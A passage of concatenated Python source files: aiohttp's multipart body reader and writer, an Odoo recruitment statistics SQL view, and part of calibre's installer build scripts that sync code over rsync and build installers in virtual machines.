            chunk = yield from self._read_chunk_from_stream(size)

        self._read_bytes += len(chunk)
        if self._read_bytes == self._length:
            self._at_eof = True
        if self._at_eof:
            # the part's payload is always followed by a CRLF before the
            # next boundary; consume and verify it
            assert b'\r\n' == (yield from self._content.readline()), \
                'reader did not read all the data or it is malformed'
        return chunk

    @asyncio.coroutine
    def _read_chunk_from_length(self, size):
        """Reads body part content chunk of the specified size.
        The body part must have `Content-Length` header with proper value.

        :param int size: chunk size

        :rtype: bytearray
        """
        assert self._length is not None, \
            'Content-Length required for chunked read'
        chunk_size = min(size, self._length - self._read_bytes)
        chunk = yield from self._content.read(chunk_size)
        return chunk

    @asyncio.coroutine
    def _read_chunk_from_stream(self, size):
        """Reads content chunk of body part with unknown length.
        The `Content-Length` header for body part is not necessary.

        :param int size: chunk size

        :rtype: bytearray
        """
        assert size >= len(self._boundary) + 2, \
            'Chunk size must be greater or equal than boundary length + 2'
        first_chunk = self._prev_chunk is None
        if first_chunk:
            self._prev_chunk = yield from self._content.read(size)

        chunk = yield from self._content.read(size)
        self._content_eof += int(self._content.at_eof())
        assert self._content_eof < 3, "Reading after EOF"
        # search for the boundary in the window spanning both chunks, so a
        # boundary split across the chunk edge is still found
        window = self._prev_chunk + chunk
        sub = b'\r\n' + self._boundary
        if first_chunk:
            idx = window.find(sub)
        else:
            idx = window.find(sub, max(0, len(self._prev_chunk) - len(sub)))
        if idx >= 0:
            # pushing boundary back to content
            self._content.unread_data(window[idx:])
            if size > idx:
                self._prev_chunk = self._prev_chunk[:idx]
            chunk = window[len(self._prev_chunk):idx]
            if not chunk:
                self._at_eof = True
        if 0 < len(chunk) < len(sub) and not self._content_eof:
            # too little data to rule out a split boundary: buffer and retry
            self._prev_chunk += chunk
            self._at_eof = False
            return b''
        result = self._prev_chunk
        self._prev_chunk = chunk
        return result

    @asyncio.coroutine
    def readline(self):
        """Reads body part by line by line.

        :rtype: bytearray
        """
        if self._at_eof:
            return b''

        if self._unread:
            line = self._unread.popleft()
        else:
            line = yield from self._content.readline()

        if line.startswith(self._boundary):
            # the very last boundary may not come with \r\n,
            # so set single rules for everyone
            sline = line.rstrip(b'\r\n')
            boundary = self._boundary
            last_boundary = self._boundary + b'--'
            # ensure that we read exactly the boundary, not something alike
            if sline == boundary or sline == last_boundary:
                self._at_eof = True
                self._unread.append(line)
                return b''
        else:
            # peek one line ahead: the CRLF before a boundary belongs to the
            # protocol, not the payload, so strip it from the returned line
            next_line = yield from self._content.readline()
            if next_line.startswith(self._boundary):
                line = line[:-2]  # strip CRLF but only once
            self._unread.append(next_line)

        return line

    @asyncio.coroutine
    def release(self):
        """Like :meth:`read`, but reads all the data to the void.

        :rtype: None
        """
        if self._at_eof:
            return
        if self._length is None:
            while not self._at_eof:
                yield from self.readline()
        else:
            while not self._at_eof:
                yield from self.read_chunk(self.chunk_size)

    @asyncio.coroutine
    def text(self, *, encoding=None):
        """Like :meth:`read`, but assumes that body part contains text data.

        :param str encoding: Custom text encoding. Overrides specified
                             in charset param of `Content-Type` header

        :rtype: str
        """
        data = yield from self.read(decode=True)
        encoding = encoding or self.get_charset(default='latin1')
        return data.decode(encoding)

    @asyncio.coroutine
    def json(self, *, encoding=None):
        """Like :meth:`read`, but assumes that body parts contains JSON data.

        :param str encoding: Custom JSON encoding. Overrides specified
                             in charset param of `Content-Type` header
        """
        data = yield from self.read(decode=True)
        if not data:
            return None
        encoding = encoding or self.get_charset(default='utf-8')
        return json.loads(data.decode(encoding))

    @asyncio.coroutine
    def form(self, *, encoding=None):
        """Like :meth:`read`, but assumes that body parts contains form
        urlencoded data.

        :param str encoding: Custom form encoding. Overrides specified
                             in charset param of `Content-Type` header
        """
        data = yield from self.read(decode=True)
        if not data:
            return None
        encoding = encoding or self.get_charset(default='utf-8')
        return parse_qsl(data.rstrip().decode(encoding), encoding=encoding)

    def at_eof(self):
        """Returns ``True`` if the boundary was reached or
        ``False`` otherwise.

        :rtype: bool
        """
        return self._at_eof

    def decode(self, data):
        """Decodes data according the specified `Content-Encoding`
        or `Content-Transfer-Encoding` headers value.

        Supports ``gzip``, ``deflate`` and ``identity`` encodings for
        `Content-Encoding` header.

        Supports ``base64``, ``quoted-printable`` encodings for
        `Content-Transfer-Encoding` header.

        :param bytearray data: Data to decode.

        :raises: :exc:`RuntimeError` - if encoding is unknown.

        :rtype: bytes
        """
        if CONTENT_TRANSFER_ENCODING in self.headers:
            data = self._decode_content_transfer(data)
        if CONTENT_ENCODING in self.headers:
            return self._decode_content(data)
        return data

    def _decode_content(self, data):
        # dispatch on the (case-insensitive) Content-Encoding value
        encoding = self.headers[CONTENT_ENCODING].lower()

        if encoding == 'deflate':
            return zlib.decompress(data, -zlib.MAX_WBITS)
        elif encoding == 'gzip':
            return zlib.decompress(data, 16 + zlib.MAX_WBITS)
        elif encoding == 'identity':
            return data
        else:
            raise RuntimeError('unknown content encoding: {}'.format(encoding))

    def _decode_content_transfer(self, data):
        # dispatch on the (case-insensitive) Content-Transfer-Encoding value
        encoding = self.headers[CONTENT_TRANSFER_ENCODING].lower()

        if encoding == 'base64':
            return base64.b64decode(data)
        elif encoding == 'quoted-printable':
            return binascii.a2b_qp(data)
        else:
            raise RuntimeError('unknown content transfer encoding: {}'
                               ''.format(encoding))

    def get_charset(self, default=None):
        """Returns charset parameter from ``Content-Type`` header or default.
        """
        ctype = self.headers.get(CONTENT_TYPE, '')
        *_, params = parse_mimetype(ctype)
        return params.get('charset', default)

    @property
    def filename(self):
        """Returns filename specified in Content-Disposition header or ``None``
        if missed or header is malformed."""
        _, params = parse_content_disposition(
            self.headers.get(CONTENT_DISPOSITION))
        return content_disposition_filename(params)
class MultipartReader(object):
    """Multipart body reader.

    Splits a multipart/* stream into per-part readers, dispatching each
    part to :attr:`part_reader_cls` (or a nested multipart reader).
    """

    #: Response wrapper, used when multipart readers constructs from response.
    response_wrapper_cls = MultipartResponseWrapper
    #: Multipart reader class, used to handle multipart/* body parts.
    #: None points to type(self)
    multipart_reader_cls = None
    #: Body part reader class for non multipart/* content types.
    part_reader_cls = BodyPartReader

    def __init__(self, headers, content):
        self.headers = headers
        # Boundary line as bytes, including the leading "--" dashes.
        self._boundary = ('--' + self._get_boundary()).encode()
        self._content = content
        # Reader state: the part currently being consumed, whether the
        # final boundary was seen, and whether we are still before the
        # first boundary (beginning of file).
        self._last_part = None
        self._at_eof = False
        self._at_bof = True
        # Lines pushed back by a finished body part; served again by
        # _readline() before touching the underlying stream.
        self._unread = []

    @asyncio.coroutine
    def __aiter__(self):
        return self

    @asyncio.coroutine
    def __anext__(self):
        # Async-iteration protocol: translate "no more parts" (None)
        # into StopAsyncIteration.
        part = yield from self.next()
        if part is None:
            raise StopAsyncIteration  # NOQA
        return part

    @classmethod
    def from_response(cls, response):
        """Constructs reader instance from HTTP response.

        :param response: :class:`~aiohttp.client.ClientResponse` instance
        """
        obj = cls.response_wrapper_cls(response, cls(response.headers,
                                                     response.content))
        return obj

    def at_eof(self):
        """Returns ``True`` if the final boundary was reached or
        ``False`` otherwise.

        :rtype: bool
        """
        return self._at_eof

    @asyncio.coroutine
    def next(self):
        """Emits the next multipart body part.

        Returns ``None`` once the closing boundary has been consumed.
        """
        # So, if we're at BOF, we need to skip till the boundary.
        if self._at_eof:
            return
        # Any previous part must be fully drained before we can look
        # for the next boundary.
        yield from self._maybe_release_last_part()
        if self._at_bof:
            yield from self._read_until_first_boundary()
            self._at_bof = False
        else:
            yield from self._read_boundary()
        if self._at_eof:  # we just read the last boundary, nothing to do there
            return
        self._last_part = yield from self.fetch_next_part()
        return self._last_part

    @asyncio.coroutine
    def release(self):
        """Reads all the body parts to the void till the final boundary."""
        while not self._at_eof:
            item = yield from self.next()
            if item is None:
                break
            yield from item.release()

    @asyncio.coroutine
    def fetch_next_part(self):
        """Returns the next body part reader."""
        headers = yield from self._read_headers()
        return self._get_part_reader(headers)

    def _get_part_reader(self, headers):
        """Dispatches the response by the `Content-Type` header, returning
        suitable reader instance.

        :param dict headers: Response headers
        """
        ctype = headers.get(CONTENT_TYPE, '')
        mtype, *_ = parse_mimetype(ctype)
        if mtype == 'multipart':
            # Nested multipart payload: recurse with the configured
            # multipart reader class (or this very class by default).
            if self.multipart_reader_cls is None:
                return type(self)(headers, self._content)
            return self.multipart_reader_cls(headers, self._content)
        else:
            return self.part_reader_cls(self._boundary, headers, self._content)

    def _get_boundary(self):
        """Extracts and validates the boundary parameter from Content-Type.

        :raises ValueError: if the parameter is missing or longer than
            70 characters (the RFC 2046 limit enforced below).
        """
        mtype, *_, params = parse_mimetype(self.headers[CONTENT_TYPE])

        assert mtype == 'multipart', 'multipart/* content type expected'

        if 'boundary' not in params:
            raise ValueError('boundary missed for Content-Type: %s'
                             % self.headers[CONTENT_TYPE])

        boundary = params['boundary']
        if len(boundary) > 70:
            raise ValueError('boundary %r is too long (70 chars max)'
                             % boundary)

        return boundary

    @asyncio.coroutine
    def _readline(self):
        # Serve pushed-back lines first (see _maybe_release_last_part()).
        if self._unread:
            return self._unread.pop()
        return (yield from self._content.readline())

    @asyncio.coroutine
    def _read_until_first_boundary(self):
        # Skip any preamble text that precedes the first boundary line.
        while True:
            chunk = yield from self._readline()
            if chunk == b'':
                raise ValueError("Could not find starting boundary %r"
                                 % (self._boundary))
            chunk = chunk.rstrip()
            if chunk == self._boundary:
                return
            elif chunk == self._boundary + b'--':
                # Closing boundary right away: an empty multipart body.
                self._at_eof = True
                return

    @asyncio.coroutine
    def _read_boundary(self):
        # After a part, the next line must be either an intermediate
        # boundary or the closing one ("--" suffix).
        chunk = (yield from self._readline()).rstrip()
        if chunk == self._boundary:
            pass
        elif chunk == self._boundary + b'--':
            self._at_eof = True
        else:
            raise ValueError('Invalid boundary %r, expected %r'
                             % (chunk, self._boundary))

    @asyncio.coroutine
    def _read_headers(self):
        lines = [b'']
        while True:
            chunk = yield from self._content.readline()
            chunk = chunk.strip()
            lines.append(chunk)
            if not chunk:
                # Blank line terminates the header block.
                break
        parser = HttpParser()
        headers, *_ = parser.parse_headers(lines)
        return headers

    @asyncio.coroutine
    def _maybe_release_last_part(self):
        """Ensures that the last read body part is read completely."""
        if self._last_part is not None:
            if not self._last_part.at_eof():
                yield from self._last_part.release()
            # Keep any lines the part over-read so _readline() serves
            # them before reading from the underlying stream again.
            self._unread.extend(self._last_part._unread)
            self._last_part = None
class BodyPartWriter(object):
    """Multipart writer for single body part.

    Wraps an arbitrary payload object and knows how to serialize it
    (headers + encoded body) as a stream of byte chunks.
    """

    def __init__(self, obj, headers=None, *, chunk_size=8192):
        # Normalize headers into a case-insensitive multidict.
        if headers is None:
            headers = CIMultiDict()
        elif not isinstance(headers, CIMultiDict):
            headers = CIMultiDict(headers)
        self.obj = obj
        self.headers = headers
        # Read granularity for file-like payloads (see _serialize_io()).
        self._chunk_size = chunk_size
        self._fill_headers_with_defaults()

        # Serializer dispatch: plain classes are matched via
        # isinstance(), (maintype, subtype) tuples are matched against
        # the Content-Type header (see _serialize_obj()).
        self._serialize_map = {
            bytes: self._serialize_bytes,
            str: self._serialize_str,
            io.IOBase: self._serialize_io,
            MultipartWriter: self._serialize_multipart,
            ('application', 'json'): self._serialize_json,
            ('application', 'x-www-form-urlencoded'): self._serialize_form
        }

    def _fill_headers_with_defaults(self):
        # Derive Content-Type / Content-Length / Content-Disposition
        # from the payload when the caller did not supply them.
        if CONTENT_TYPE not in self.headers:
            content_type = self._guess_content_type(self.obj)
            if content_type is not None:
                self.headers[CONTENT_TYPE] = content_type

        if CONTENT_LENGTH not in self.headers:
            content_length = self._guess_content_length(self.obj)
            if content_length is not None:
                self.headers[CONTENT_LENGTH] = str(content_length)

        if CONTENT_DISPOSITION not in self.headers:
            filename = self._guess_filename(self.obj)
            if filename is not None:
                self.set_content_disposition('attachment', filename=filename)

    def _guess_content_length(self, obj):
        """Returns the byte length of *obj* or ``None`` if unknown."""
        if isinstance(obj, bytes):
            return len(obj)
        elif isinstance(obj, str):
            # Length depends on the charset the string will be encoded
            # with at serialization time.
            *_, params = parse_mimetype(self.headers.get(CONTENT_TYPE))
            charset = params.get('charset', 'us-ascii')
            return len(obj.encode(charset))
        elif isinstance(obj, io.StringIO):
            *_, params = parse_mimetype(self.headers.get(CONTENT_TYPE))
            charset = params.get('charset', 'us-ascii')
            # Only the unread remainder counts, hence "- obj.tell()".
            return len(obj.getvalue().encode(charset)) - obj.tell()
        elif isinstance(obj, io.BytesIO):
            return len(obj.getvalue()) - obj.tell()
        elif isinstance(obj, io.IOBase):
            try:
                return os.fstat(obj.fileno()).st_size - obj.tell()
            except (AttributeError, OSError):
                # Not a real file (no fileno) or stat failed.
                return None
        else:
            return None

    def _guess_content_type(self, obj, default='application/octet-stream'):
        if hasattr(obj, 'name'):
            name = getattr(obj, 'name')
            # NOTE(review): mimetypes.guess_type() returns (None, None)
            # for unknown extensions, so this can return None instead of
            # *default* -- confirm whether falling back to *default*
            # was intended here.
            return mimetypes.guess_type(name)[0]
        elif isinstance(obj, (str, io.StringIO)):
            return 'text/plain; charset=utf-8'
        else:
            return default

    def _guess_filename(self, obj):
        # Only file-like objects carry a useful name; returns None
        # implicitly otherwise.
        if isinstance(obj, io.IOBase):
            name = getattr(obj, 'name', None)
            if name is not None:
                return Path(name).name

    def serialize(self):
        """Yields byte chunks for body part."""

        has_encoding = (
            CONTENT_ENCODING in self.headers and
            self.headers[CONTENT_ENCODING] != 'identity' or
            CONTENT_TRANSFER_ENCODING in self.headers
        )
        if has_encoding:
            # since we're following streaming approach which doesn't assumes
            # any intermediate buffers, we cannot calculate real content length
            # with the specified content encoding scheme. So, instead of lying
            # about content length and cause reading issues, we have to strip
            # this information.
            self.headers.pop(CONTENT_LENGTH, None)

        if self.headers:
            # Header block: "Name: value" lines joined by CRLF.
            yield b'\r\n'.join(
                b': '.join(map(lambda i: i.encode('latin1'), item))
                for item in self.headers.items()
            )
        # Blank line separates headers from the (encoded) body.
        yield b'\r\n\r\n'
        yield from self._maybe_encode_stream(self._serialize_obj())
        yield b'\r\n'

    def _serialize_obj(self):
        """Picks a serializer for self.obj and returns its chunk generator.

        Content-Type (maintype, subtype) match takes precedence over
        an isinstance() match on the payload class.
        """
        obj = self.obj
        mtype, stype, *_ = parse_mimetype(self.headers.get(CONTENT_TYPE))
        serializer = self._serialize_map.get((mtype, stype))
        if serializer is not None:
            return serializer(obj)

        for key in self._serialize_map:
            if not isinstance(key, tuple) and isinstance(obj, key):
                return self._serialize_map[key](obj)
        return self._serialize_default(obj)

    def _serialize_bytes(self, obj):
        yield obj

    def _serialize_str(self, obj):
        # Encode with the charset from Content-Type (default us-ascii).
        *_, params = parse_mimetype(self.headers.get(CONTENT_TYPE))
        yield obj.encode(params.get('charset', 'us-ascii'))

    def _serialize_io(self, obj):
        # Stream file-like payloads in fixed-size chunks.
        while True:
            chunk = obj.read(self._chunk_size)
            if not chunk:
                break
            if isinstance(chunk, str):
                yield from self._serialize_str(chunk)
            else:
                yield from self._serialize_bytes(chunk)

    def _serialize_multipart(self, obj):
        # Nested multipart payload serializes itself.
        yield from obj.serialize()

    def _serialize_json(self, obj):
        *_, params = parse_mimetype(self.headers.get(CONTENT_TYPE))
        yield json.dumps(obj).encode(params.get('charset', 'utf-8'))

    def _serialize_form(self, obj):
        if isinstance(obj, Mapping):
            obj = list(obj.items())
        return self._serialize_str(urlencode(obj, doseq=True))

    def _serialize_default(self, obj):
        raise TypeError('unknown body part type %r' % type(obj))

    def _maybe_encode_stream(self, stream):
        # Apply content encoding first, then transfer encoding, in the
        # same order a reader would undo them.
        if CONTENT_ENCODING in self.headers:
            stream = self._apply_content_encoding(stream)
        if CONTENT_TRANSFER_ENCODING in self.headers:
            stream = self._apply_content_transfer_encoding(stream)
        yield from stream

    def _apply_content_encoding(self, stream):
        encoding = self.headers[CONTENT_ENCODING].lower()
        if encoding == 'identity':
            yield from stream
        elif encoding in ('deflate', 'gzip'):
            if encoding == 'gzip':
                zlib_mode = 16 + zlib.MAX_WBITS   # gzip wrapper
            else:
                zlib_mode = -zlib.MAX_WBITS       # raw deflate
            zcomp = zlib.compressobj(wbits=zlib_mode)
            for chunk in stream:
                yield zcomp.compress(chunk)
            else:
                # for/else: runs once the stream is exhausted (there is
                # no break above), flushing the compressor tail.
                yield zcomp.flush()
        else:
            raise RuntimeError('unknown content encoding: {}'
                               ''.format(encoding))

    def _apply_content_transfer_encoding(self, stream):
        encoding = self.headers[CONTENT_TRANSFER_ENCODING].lower()
        if encoding == 'base64':
            # Accumulate bytes so b64encode is always fed whole 3-byte
            # groups; only the final remainder gets padding.
            buffer = bytearray()
            while True:
                if buffer:
                    div, mod = divmod(len(buffer), 3)
                    chunk, buffer = buffer[:div * 3], buffer[div * 3:]
                    if chunk:
                        yield base64.b64encode(chunk)
                chunk = next(stream, None)
                if not chunk:
                    if buffer:
                        yield base64.b64encode(buffer[:])
                    return
                buffer.extend(chunk)
        elif encoding == 'quoted-printable':
            for chunk in stream:
                yield binascii.b2a_qp(chunk)
        else:
            raise RuntimeError('unknown content transfer encoding: {}'
                               ''.format(encoding))

    def set_content_disposition(self, disptype, **params):
        """Sets ``Content-Disposition`` header.

        :param str disptype: Disposition type: inline, attachment, form-data.
                             Should be valid extension token (see RFC 2183)
        :param dict params: Disposition params
        """
        # NOTE(review): "TOKEN > set(...)" is a proper-superset test, so
        # a value using every token character would be rejected --
        # confirm ">=" was not intended.
        if not disptype or not (TOKEN > set(disptype)):
            raise ValueError('bad content disposition type {!r}'
                             ''.format(disptype))
        value = disptype
        if params:
            lparams = []
            for key, val in params.items():
                if not key or not (TOKEN > set(key)):
                    raise ValueError('bad content disposition parameter'
                                     ' {!r}={!r}'.format(key, val))
                qval = quote(val, '')
                lparams.append((key, '"%s"' % qval))
                if key == 'filename':
                    # RFC 5987-style extended parameter for non-ASCII
                    # filenames, alongside the plain quoted one.
                    lparams.append(('filename*', "utf-8''" + qval))
            sparams = '; '.join('='.join(pair) for pair in lparams)
            value = '; '.join((value, sparams))
        self.headers[CONTENT_DISPOSITION] = value

    @property
    def filename(self):
        """Returns filename specified in Content-Disposition header or ``None``
        if missed."""
        _, params = parse_content_disposition(
            self.headers.get(CONTENT_DISPOSITION))
        return content_disposition_filename(params)
class MultipartWriter(object):
    """Multipart body writer.

    Collects :class:`BodyPartWriter` parts and serializes them with
    boundary delimiters.
    """

    #: Body part reader class for non multipart/* content types.
    part_writer_cls = BodyPartWriter

    def __init__(self, subtype='mixed', boundary=None):
        # A random hex boundary is generated unless one is supplied.
        boundary = boundary if boundary is not None else uuid.uuid4().hex
        try:
            # Boundary must survive a us-ascii round trip (header value).
            boundary.encode('us-ascii')
        except UnicodeEncodeError:
            raise ValueError('boundary should contains ASCII only chars')
        self.headers = CIMultiDict()
        self.headers[CONTENT_TYPE] = 'multipart/{}; boundary="{}"'.format(
            subtype, boundary
        )
        self.parts = []

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # No resources to release; context-manager form is for symmetry.
        pass

    def __iter__(self):
        return iter(self.parts)

    def __len__(self):
        return len(self.parts)

    @property
    def boundary(self):
        # Read the boundary back out of the Content-Type header, as bytes.
        *_, params = parse_mimetype(self.headers.get(CONTENT_TYPE))
        return params['boundary'].encode('us-ascii')

    def append(self, obj, headers=None):
        """Adds a new body part to multipart writer.

        Accepts either an existing part writer (whose headers are
        updated) or a raw payload to wrap. Returns the appended part.
        """
        if isinstance(obj, self.part_writer_cls):
            if headers:
                obj.headers.update(headers)
            self.parts.append(obj)
        else:
            if not headers:
                headers = CIMultiDict()
            self.parts.append(self.part_writer_cls(obj, headers))
        return self.parts[-1]

    def append_json(self, obj, headers=None):
        """Helper to append JSON part."""
        if not headers:
            headers = CIMultiDict()
        headers[CONTENT_TYPE] = 'application/json'
        return self.append(obj, headers)

    def append_form(self, obj, headers=None):
        """Helper to append form urlencoded part."""
        if not headers:
            headers = CIMultiDict()
        headers[CONTENT_TYPE] = 'application/x-www-form-urlencoded'
        assert isinstance(obj, (Sequence, Mapping))
        return self.append(obj, headers)

    def serialize(self):
        """Yields multipart byte chunks."""
        if not self.parts:
            yield b''
            return

        for part in self.parts:
            yield b'--' + self.boundary + b'\r\n'
            yield from part.serialize()
        else:
            # for/else: after all parts (no break above), emit the
            # closing boundary with the trailing "--".
            yield b'--' + self.boundary + b'--\r\n'

        yield b''
# license: apache-2.0
# ---- doomsterinc/odoo :: addons/hr_recruitment/report/hr_recruitment_report.py ----
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.osv import fields, osv
from .. import hr_recruitment
from openerp.addons.decimal_precision import decimal_precision as dp
class hr_recruitment_report(osv.Model):
    """Read-only recruitment statistics model backed by a SQL view.

    The view (created in init()) aggregates hr_applicant rows; all
    columns are therefore read-only and _auto is disabled so no table
    is created for this model.
    """
    _name = "hr.recruitment.report"
    _description = "Recruitments Statistics"
    _auto = False                      # no backing table: SQL view only
    _rec_name = 'date_create'
    _order = 'date_create desc'

    _columns = {
        'user_id': fields.many2one('res.users', 'User', readonly=True),
        'company_id': fields.many2one('res.company', 'Company', readonly=True),
        'date_create': fields.datetime('Create Date', readonly=True),
        'date_last_stage_update': fields.datetime('Last Stage Update', readonly=True),
        'date_closed': fields.date('Closed', readonly=True),
        'job_id': fields.many2one('hr.job', 'Applied Job',readonly=True),
        'stage_id': fields.many2one ('hr.recruitment.stage', 'Stage'),
        'type_id': fields.many2one('hr.recruitment.degree', 'Degree'),
        'department_id': fields.many2one('hr.department','Department',readonly=True),
        'priority': fields.selection(hr_recruitment.AVAILABLE_PRIORITIES, 'Appreciation'),
        'salary_prop' : fields.float("Salary Proposed", digits_compute=dp.get_precision('Account')),
        # *_avg columns use group_operator="avg" so grouped views show
        # averages instead of sums.
        'salary_prop_avg' : fields.float("Avg. Proposed Salary", group_operator="avg", digits_compute=dp.get_precision('Account')),
        'salary_exp' : fields.float("Salary Expected", digits_compute=dp.get_precision('Account')),
        'salary_exp_avg' : fields.float("Avg. Expected Salary", group_operator="avg", digits_compute=dp.get_precision('Account')),
        'partner_id': fields.many2one('res.partner', 'Partner',readonly=True),
        'available': fields.float("Availability"),
        # NOTE(review): help text mentions "project issue" -- looks
        # copied from another module; confirm intended wording.
        'delay_close': fields.float('Avg. Delay to Close', digits=(16,2), readonly=True, group_operator="avg",
                                    help="Number of Days to close the project issue"),
        'last_stage_id': fields.many2one ('hr.recruitment.stage', 'Last Stage'),
    }

    def init(self, cr):
        """(Re)creates the hr_recruitment_report view over hr_applicant.

        delay_close is computed as (write_date - create_date) in days.
        """
        tools.drop_view_if_exists(cr, 'hr_recruitment_report')
        cr.execute("""
            create or replace view hr_recruitment_report as (
                select
                    min(s.id) as id,
                    s.create_date as date_create,
                    date(s.date_closed) as date_closed,
                    s.date_last_stage_update as date_last_stage_update,
                    s.partner_id,
                    s.company_id,
                    s.user_id,
                    s.job_id,
                    s.type_id,
                    sum(s.availability) as available,
                    s.department_id,
                    s.priority,
                    s.stage_id,
                    s.last_stage_id,
                    sum(salary_proposed) as salary_prop,
                    (sum(salary_proposed)/count(*)) as salary_prop_avg,
                    sum(salary_expected) as salary_exp,
                    (sum(salary_expected)/count(*)) as salary_exp_avg,
                    extract('epoch' from (s.write_date-s.create_date))/(3600*24) as delay_close,
                    count(*) as nbr
                from hr_applicant s
                group by
                    s.date_open,
                    s.create_date,
                    s.write_date,
                    s.date_closed,
                    s.date_last_stage_update,
                    s.partner_id,
                    s.company_id,
                    s.user_id,
                    s.stage_id,
                    s.last_stage_id,
                    s.type_id,
                    s.priority,
                    s.job_id,
                    s.department_id
            )
        """)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
# license: agpl-3.0
# ---- sss/calibre-at-bzr :: setup/installer/__init__.py ----
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import subprocess, tempfile, os, time, socket
from setup import Command, installer_name
from setup.build_environment import HOST, PROJECT
# Base rsync invocation shared by all sync commands; --delete/--force
# keep the destination an exact mirror of the source.
BASE_RSYNC = ['rsync', '-avz', '--delete', '--force']

# Build the repeated "--exclude PATTERN" argument list.
EXCLUDES = []
for x in [
    'src/calibre/plugins', 'src/calibre/manual', 'src/calibre/trac',
    '.bzr', '.git', '.build', '.svn', 'build', 'dist', 'imgsrc', '*.pyc', '*.pyo', '*.swp',
    '*.swo', 'format_docs']:
    EXCLUDES.extend(['--exclude', x])

# Variant with glob patterns quoted -- presumably to keep a remote
# shell from expanding them; verify against how SYNC_CMD is executed.
SAFE_EXCLUDES = ['"%s"'%x if '*' in x else x for x in EXCLUDES]
def get_rsync_pw():
    """Returns the rsync password for the buildbot user.

    The password is the text after the first ``:`` in the local
    buildbot config file.
    """
    # Use a context manager so the handle is closed deterministically
    # (the previous code leaked it until garbage collection).
    with open('/home/kovid/work/kde/conf/buildbot') as f:
        return f.read().partition(':')[-1].strip()
def is_vm_running(name):
    """Returns True if a vmware-vmx process whose command line contains
    ``/<name>/`` is currently running.

    Scans /proc for numeric (process) entries and inspects each
    cmdline pseudo-file.
    """
    pat = '/%s/'%name
    pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
    for pid in pids:
        try:
            # with-block closes each cmdline handle promptly instead of
            # leaking one per scanned process.
            with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as f:
                cmdline = f.read()
        except IOError:
            continue  # process exited between listdir() and open()
        if 'vmware-vmx' in cmdline and pat in cmdline:
            return True
    return False
class Rsync(Command):
    """Pulls the source tree from the development machine over rsync."""

    description = 'Sync source tree from development machine'

    # Template command; {host}/{project} are filled in by run().
    SYNC_CMD = ' '.join(BASE_RSYNC+SAFE_EXCLUDES+
            ['rsync://buildbot@{host}/work/{project}', '..'])

    def run(self, opts):
        cmd = self.SYNC_CMD.format(host=HOST, project=PROJECT)
        env = dict(os.environ)
        # rsync reads the password from this environment variable.
        env['RSYNC_PASSWORD'] = get_rsync_pw()
        self.info(cmd)
        subprocess.check_call(cmd, shell=True, env=env)
class Push(Command):
    """Pushes the working tree to the configured build hosts in parallel.

    Note: Python 2 module (print statements, dict.iteritems()).
    """

    description = 'Push code to another host'

    def run(self, opts):
        from threading import Thread
        threads = []
        # Maps rsync destination -> VM name (None for always-on hosts).
        for host, vmname in {
                r'Owner@winxp:/cygdrive/c/Documents\ and\ Settings/Owner/calibre':'winxp',
                'kovid@ox:calibre':None,
                r'kovid@win7:/cygdrive/c/Users/kovid/calibre':'Windows 7',
                'kovid@getafix:calibre-src':None,
                }.iteritems():
            # Don't push to ourselves.
            if '@getafix:' in host and socket.gethostname() == 'getafix':
                continue
            # Skip VMs that are not currently running.
            if vmname is None or is_vm_running(vmname):
                rcmd = BASE_RSYNC + EXCLUDES + ['.', host]
                print '\n\nPushing to:', vmname or host, '\n'
                # One rsync per host, run concurrently; output discarded.
                threads.append(Thread(target=subprocess.check_call, args=(rcmd,),
                    kwargs={'stdout':open(os.devnull, 'wb')}))
                threads[-1].start()
        for thread in threads:
            thread.join()
class VMInstaller(Command):
    """Base class for commands that build a calibre installer inside a
    VMWare virtual machine.

    Subclasses configure the class attributes below (VM paths, freeze
    command, installer extension). Note: Python 2 module.
    """

    # Extra seconds to wait after the VM answers ping, before SSH-ing.
    EXTRA_SLEEP = 5

    # Subclass configuration knobs.
    INSTALLER_EXT = None
    VM = None
    VM_NAME = None
    VM_CHECK = None
    FREEZE_COMMAND = None
    FREEZE_TEMPLATE = 'python setup.py {freeze_command}'
    SHUTDOWN_CMD = ['sudo', 'poweroff']
    IS_64_BIT = False

    BUILD_CMD = 'ssh -t %s bash build-calibre'
    BUILD_PREFIX = ['#!/bin/bash', 'export CALIBRE_BUILDBOT=1']
    BUILD_RSYNC = [r'cd ~/build/{project}', Rsync.SYNC_CMD]
    BUILD_CLEAN = ['rm -rf dist/* build/* src/calibre/plugins/*']
    BUILD_BUILD = ['python setup.py build',]

    def add_options(self, parser):
        # Guard against double registration when several installer
        # commands share one option parser.
        if not parser.has_option('--dont-shutdown'):
            parser.add_option('-s', '--dont-shutdown', default=False,
                action='store_true', help='Dont shutdown the VM after building')
        if not parser.has_option('--vm'):
            parser.add_option('--vm', help='Path to VM launcher script')

    def get_build_script(self):
        """Returns the shell script run inside the VM: sync sources,
        clean, build, then freeze the installer."""
        rs = ['export RSYNC_PASSWORD=%s'%get_rsync_pw()]
        ans = '\n'.join(self.BUILD_PREFIX + rs)+'\n\n'
        # Chain the remaining steps with "&&" so any failure aborts.
        ans += ' && \\\n'.join(self.BUILD_RSYNC) + ' && \\\n'
        ans += ' && \\\n'.join(self.BUILD_CLEAN) + ' && \\\n'
        ans += ' && \\\n'.join(self.BUILD_BUILD) + ' && \\\n'
        ans += self.FREEZE_TEMPLATE.format(freeze_command=self.FREEZE_COMMAND) + '\n'
        ans = ans.format(project=PROJECT, host=HOST)
        return ans

    def vmware_started(self):
